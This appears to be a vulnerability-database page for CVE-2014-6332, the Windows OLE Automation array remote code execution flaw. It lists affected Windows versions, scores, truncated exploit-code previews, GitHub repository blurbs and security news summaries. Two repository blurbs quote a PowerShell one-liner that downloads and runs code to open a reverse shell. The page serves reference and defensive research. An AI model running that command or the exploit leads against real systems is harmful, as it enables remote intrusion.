CVE-2014-6332

Published: 11/11/2014 | Updated: 15/05/2019
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 978
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote malicious users to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."

Vulnerable Product

Microsoft Windows Server 2008 R2

Microsoft Windows 7

Microsoft Windows Server 2008

Microsoft Windows Vista

Microsoft Windows RT

Microsoft Windows RT 8.1

Microsoft Windows Server 2012

Microsoft Windows 8.1

Microsoft Windows Server 2003

Microsoft Windows Server 2012 R2

Microsoft Windows 8

Exploits

This Metasploit module exploits Windows OLE Automation Array Vulnerability known as CVE-2014-6332. The vulnerability affects Internet Explorer 3.0 until version 11 within Windows 95 up to Windows 10. PowerShell is required on the target machine. On Internet Explorer versions using Protected Mode, the user has to manually allow powershell.exe to exec ...
IBM Security AppScan versions 9.0.2 and below suffer from an OLE automation array remote code execution vulnerability ...
This Metasploit module exploits the Windows OLE automation array remote code execution vulnerability. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows 95 up to Windows 10 ...
Microsoft HTA (HTML Application) suffers from a remote code execution vulnerability ...
//* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009 cve-2014-6332 exploit twittercom/yuange75 hibaiducom/yuange1975 *// <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function ...
#!/usr/bin/php <?php ########################################################## # Author : Ehsan Noreddini # E-Mail : me@ehsanninfo # Social : @prot3ct0r # Title : The World Browser Remote Code Execution # TheWorld Browser is a tiny, fast and powerful web Browser It is completely free Ther ...
#!/usr/bin/python import BaseHTTPServer, sys, socket ## # Acunetix OLE Automation Array Remote Code Execution # # Author: Naser Farhadi # Linkedin: irlinkedincom/pub/naser-farhadi/85/b3b/909 # # Date: 27 Mar 2015 # Version: <=95 # Tested on: Windows 7 # Description: Acunetix Login Sequence Recorder (lsrexe) Uses CoCreateInstance API ...
#!/usr/bin/php <?php ########################################################## # Title : HTML Compiler Remote Code Execution # HTML Compiler is a program that allows you to put an entire HTML application into a standalone Windows application # Author : Ehsan Noreddini # E-Mail : me@ehsanninfo # Soc ...
<!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <body> <pre> |--------------------------------------------------------------------------| | Title: OLE Automation Array Remote Code Execution => Pre IE11 ...
#!/usr/bin/php <?php # Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : irlinkedincom/in/rezasp # E-Mail : me[at]reza[dot]es , rezaespargham[at]gmail[dot]com # Website : ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/powershell' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Powershell ...
#!/usr/bin/php <?php # Title : Havij OLE Automation Array Remote Code Execution # Affected Versions: All Version # Founder : ITSecTeam # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : irlinkedincom/in/rezasp # E-Mail : me[at]reza[dot]es , rezaespargham[at]gmail[dot]com # Websit ...
#!/usr/bin/php <?php # Title : Internet Download Manager - OLE Automation Array Remote Code Execution # Affected Versions: All Version # Founder : InternetDownloadManager # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : irlinkedincom/in/rezasp # E-Ma ...

Github Repositories

CVE-2014-6332 ZeroDay POC - Starts PowerShell


Case repo for the HTMLMTH evasion server.

HtmlmthCases: Cases for HTMLMTH

Second project of the cyber specialization

This repository belongs to T3 Zabala Gailetak of the Ciber course. Status: In progress. Table of Contents: Production incidents, Django Web, Android App, Phishing, Hacking, Docs, License. Hacking Windows 7 Professional. 0) Introduction: To begin, we used the CVE-2014-6332 vulnerability to exploit the victim Windows 7 machine. It takes advantage of a flaw in an Internet Explorer component. O

Analysis of VBS exploit CVE-2018-8174

Dissecting modern browser exploit: case study of CVE-2018-8174. Overview: When this exploit first emerged in the turn of April and May it spiked my interest, since despite heavy obfuscation, the code structure seemed well organized and the vulnerability exploitation code small enough to make analysis simpler. I downloaded POC from github and decided it would be a good candidate f

PoC collection

PoC Collection Index:
CVE-2014-4114 -- PowerPoint RCE
CVE-2014-6271 -- Shell Shock
CVE-2014-6332 -- VBScript RCE in IE
CVE-2015-1328 -- Ubuntu local root exploit

PowerShell Reverse HTTP(s) Shell

powersh-rat: PowerShell Reverse HTTP(s) Shell. Invoke PoshRat.ps1 on a server you control. Requires Admin rights to listen on ports. To spawn the reverse shell, run on client: iex (New-Object NetWebClient)DownloadString("server/connect") [OR] browse to or send link to server/apphta [OR] for CVE-2014-6332 send link to server/app

zenscrawler - webcrawler written in python Sample output zen@intel:~/Desktop/spider$ time /mainpy Processing links:

PowerShell Reverse HTTPs Shell

PoshRat: PowerShell Reverse HTTP(s) Shell. Invoke PoshRat.ps1 on a server you control. Requires Admin rights to listen on ports. To spawn the reverse shell, run on client: iex (New-Object NetWebClient)DownloadString("server/connect") [OR] browse to or send link to server/apphta [OR] for CVE-2014-6332 send link to server/apphtml Creat

MSFT SFB URI Vulnerability Report

MSFT SFB URI Vulnerability Report. Report date: October, 2018. Summary: A vulnerability exists in the Skype Meetings App executable (Skype Meetings App.exe). Microsoft SmartScreen and potentially other security features are circumvented. The vulnerability is exploited by launching a target website via the Skype for Business URI (sfb://). Skype Meetings App.exe uses Internet Explor

Analyzing Rig Exploit Kit

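First-time Rig Exploit Kit reading. This article was published by @nao_sec (@kkrnt, @PINKSAWTOOTH) on 2017-05-15. The authors accept no responsibility whatsoever for the content written here. Introduction: It has been three months since I started looking into Drive-by Download attacks as a hobby. Until then, I only vaguely knew the outline of the attacks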

Recent Articles

Delving deep into VBScript
Securelist • Boris Larin • 03 Jul 2018

In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object. But whereas CVE-2014-6332 was aimed at...

The King is dead. Long live the King!
Securelist • Vladislav Stolyarov Boris Larin Anton Ivanov • 09 May 2018

In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174. Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by sever...

IT threat evolution Q1 2017. Statistics
Securelist • Roman Unuchek Fedor Sinitsyn Denis Parinov Vladislav Stolyarov • 22 May 2017

According to KSN data, Kaspersky Lab solutions detected and repelled 479,528,279 malicious attacks from online resources located in 190 countries all over the world. 79,209,775 unique URLs were recognized as malicious by web antivirus components. Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 288 thousand user computers. Crypto ransomware attacks were blocked on 240,799 computers of unique users. Kaspersky Lab’s file antivirus det...

Hackers add exploit kit to article asking 'Is cyber crime out of control?'
The Register • Darren Pauli • 11 Dec 2015

Net menaces show warped sense of humour in attack on Grauniad story

Hackers have hosed an article published by The Guardian using the world's nastiest exploit kit Angler to pop the machines of exposed readers. The attack firmly answers the article's headline positing the question 'is cybercrime out of control', based on arguments in a book by one Misha Glenny. Angler is the most capable and prolific exploit kit in use by criminals. It allows attackers to run choice cuts of the latest Flash, Java, and browser exploits through which unpatched users can be targete...

The Spring Dragon APT
Securelist • Kurt Baumgartner • 17 Jun 2015

Let’s examine a couple of interesting delivery techniques from an APT active for the past several years, the Spring Dragon APT. A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label “the Lotus Blossom Operation”, likely named for the debug string present in much of the “Elise” codebase since at least 2012: “d:\lstudio\projects\lotus\…”. The group’s capabilities are more than the much discussed CVE-2012-0158 ex...

Poison résumé attack gives ransomware a gig on the desktop
The Register • Darren Pauli • 12 Jun 2015

Multiple rival researchers warn of Cryptowall delivery ruse targeting employers

Security researchers are focussing their crosshairs on what appears to be high-volume spam and exploit campaigns to deliver the latest iteration of the Cryptowall ransomware. Boffins from the SANS Institute, Cisco, and MalwareBytes have identified a dangerous if goofy spam campaign slinging the nasty ransomware masquerading as file attachment bearing a résumé. SANS handler Brad Duncan says the two campaigns to foist Cryptowall 3.0, also known as Croti, appear to be the handiwork of one attacke...

How exploit packs are concealed in a Flash object
Securelist • Vasily Davydov Anton Ivanov Dmitry Vinogradov • 22 Apr 2015

One of the most important features of a malicious attack is its ability to conceal itself from both protection solutions and victims. The main role in performing a hidden attack is played by exploits to software vulnerabilities that can be used to secretly download malicious code on the victim machine. Generally, exploits are distributed in exploit packs which appear in the form of plugin detects (to identify the type and version of software installed on the user computer) and a set of exploits,...

Zero-day hacking group resorts to UNICORN SMUT-SLINGING
The Register • Darren Pauli • 26 Nov 2014

Playboy ploy not beneath APT3

Sysadmins who have not yet patched their Windows boxes against the 18-year-old "unicorn-like" OLE bug disclosed last month could expect a deluge of spear phishing smut from a group once confined to lofty targeted zero-day attacks. The talented APT3 group was behind widespread zero-day attacks code-named Clandestine Fox earlier this year and was now targeting recently patched Windows vulnerabilities, according to FireEye researchers. That group had begun spewing spear-phishing emails targeting tw...

DAY ZERO, and COUNTING: EVIL 'UNICORN' all-Windows vuln - are YOU patched?
The Register • Darren Pauli • 12 Nov 2014

We will all remember the 11th of November

Security researcher Robert Freeman has discovered an 18-year-old, critical, remotely-exploitable vulnerability di tutti vulnerabiliti which affects just about ALL versions of Windows - all the way back to Windows 95. The vulnerability (CVE-2014-6332) rated a critical score of 9.3 in all versions of Windows and was described as a rare "unicorn-like" bug in Internet Explorer-dependent code that opens avenues for man in the middle attacks. The bug bypasses Redmond's lauded Enhanced Mitigation Exper...